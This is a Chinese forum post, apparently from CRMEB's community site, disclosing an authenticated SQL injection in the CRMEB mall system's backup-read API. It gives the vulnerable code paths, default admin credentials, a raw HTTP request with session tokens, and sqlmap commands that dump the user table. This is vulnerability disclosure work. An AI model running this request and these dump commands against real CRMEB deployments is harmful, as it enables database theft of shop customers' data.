全部
常见问题
产品动态
精选推荐
功能建议

分析中 已回复 待规划 {{opt.name}}
分析中 已回复 待规划
CRMEB 存在/adminapi/system/backup/read 接口 SQL 注入漏洞

管理 管理 编辑 删除

CRMEB是众邦科技的一款开源商城系统。是Gitee最有价值开源项目(GVP)。 Star数17.6K

项目地址:https://gitee.com/ZhongBangKeJi/CRMEB

官网地址:https://www.crmeb.com/

演示地址:https://v6.crmeb.net/admin/



漏洞描述:CRMEB的后台数据备份功能读取数据库表结构时,将用户传入的 tablename 参数直接拼接至 SQL 查询语句,未使用参数化查询或输入过滤,导致认证后的 SQL 注入漏洞。

漏洞等级:中

漏洞前提:需要认证




代码审计:

入口:crmeb/app/adminapi/controller/v1/system/SystemDatabackup.php:53-56

Sink:crmeb/app/services/system/SystemDatabackupServices.php:65-74





漏洞验证:

  1. 使用Docker启动服务,后台: http://localhost:8080/admin (账号: admin,密码: crmeb.com)。

    在如图位置点击详情触发接口地址。

  1. 通过 1 = 1验证共有1980条数据。 正常请求只有55条
GET /adminapi/system/backup/read?tablename=eb_user* HTTP/1.1
Host: 10.12.169.249:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0
Referer: http://10.12.169.249:8080/admin/system/maintain/system_databackup/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: access_token=%22eyJraWQiOiIxMDA5ZWFjMi03YjZmLTQ1YmEtOWFjYS0wYTNhMjU5YWQ4NGMiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJuZXhpb3QiLCJhdWQiOiJ3ZWIiLCJuYmYiOjE3ODEyNDEyMTMsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6OTA5MSIsImV4cCI6MTc4MTI0NDgxMywiaWF0IjoxNzgxMjQxMjEzLCJqdGkiOiI0YzlmYmQ0Yi1kYmJlLTRlMTktOTEzOS1hMzVmZGQxYjI3YTMifQ.GuwjiXQ296FuUZly4vS6wHUC0_OHWxERX1g8qSDjU6pIK6wKwSukhO9r8U4rZsz0PGAtZcjVqzIpSV_Z8AIFlLT547daQPMrdCxvH45UTopVZTO2PhKLTMHyM4N4yROrMn_Wo7wujt_4nz6e_ZD2k6D7TV-Erhe0Vusm1N2wqWeexi5e9mA8catdd3VGjsxRO8h4FtPHoccEGF-_iDYQwJSgYu1bMAmN4xUERGWGE1ohqWGJbWesQJKkE-bC74_RniE4ACMEbtDibSGgdAfr9pniKZNXnnh9XduQM0CNGqxjPZGa1lmVY2-VYHusz67KafTdyG8C2JIoMsXvzWtowQ%22; cb_lang=zh-cn; PHPSESSID=a41d331c25ccb597654d37b0f8c562df; from-crmeb-admin%3AWS_ADMIN_URL=ws://10.12.169.249:8080/notice; from-crmeb-admin%3AWS_CHAT_URL=ws://10.12.169.249:8080/msg; from-crmeb-admin%3Auuid=1; from-crmeb-admin%3Atoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0; from-crmeb-admin%3Aexpires_time=1783926656
Connection: keep-alive
将如上数据包放入SQLMAP。
python3 sqlmap.py -r poc.txt
 python3 sqlmap.py -r poc.txt -D crmeb -T  eb_user  --dump
 


{{voteData.voteSum}} 人已参与
支持
反对
请登录后查看

b352c7056395 最后编辑于2026-06-13 23:39:50

快捷回复
回复
回复
回复({{post_count}}) {{!is_user ? '我的回复' :'全部回复'}}
排序 默认正序 回复倒序 点赞倒序

{{item.user_info.nickname ? item.user_info.nickname : item.user_name}} LV.{{ item.user_info.bbs_level || item.bbs_level }}

作者 管理员 企业

{{item.floor}}# 同步到gitee 已同步到gitee {{item.is_suggest == 1? '取消推荐': '推荐'}}
{{item.is_suggest == 1? '取消推荐': '推荐'}} 【已收集】
{{item.floor}}# 沙发 板凳 地板 {{item.floor}}# 【已收集】
{{item.user_info.title || '暂无简介'}}
附件

{{itemf.name}}

{{item.created_at}}  {{item.ip_address}}
打赏
已打赏¥{{item.reward_price}}
{{item.like_count}}
分享
{{item.showReply ? '取消回复' : '回复'}}
删除
回复
回复

{{itemc.user_info.nickname}}

{{itemc.user_name}}

回复 {{itemc.comment_user_info.nickname}}

附件

{{itemf.name}}

{{itemc.created_at}}
打赏
已打赏¥{{itemc.reward_price}}
{{itemc.like_count}}
{{itemc.showReply ? '取消回复' : '回复'}}
删除
回复
回复
收起 展开更多
查看更多
打赏
已打赏¥{{reward_price}}
8
{{like_count}}
{{collect_count}}
添加回复 ({{post_count}})

相关推荐

快速安全登录

使用微信扫码登录
回复
回复
问题:
问题自动获取的帖子内容,不准确时需要手动修改. [获取答案]
答案:
提交
bug 需求 取 消 确 定
打赏金额
当前余额:¥{{rewardUserInfo.reward_price}}
{{item.price}}元
请输入 0.1-{{reward_max_price}} 范围内的数值
打赏成功
¥{{price}}
完成 确认打赏

微信登录/注册

切换手机号登录

{{ bind_phone ? '绑定手机' : '手机登录'}}

{{codeText}}
切换微信登录/注册
暂不绑定
CRMEB客服
CRMEB咨询热线 400-8888-794

扫码领取产品资料

功能清单
思维导图
安装教程
CRMEB开源商城下载 源码下载 CRMEB帮助文档 帮助文档
返回顶部 返回顶部
CRMEB客服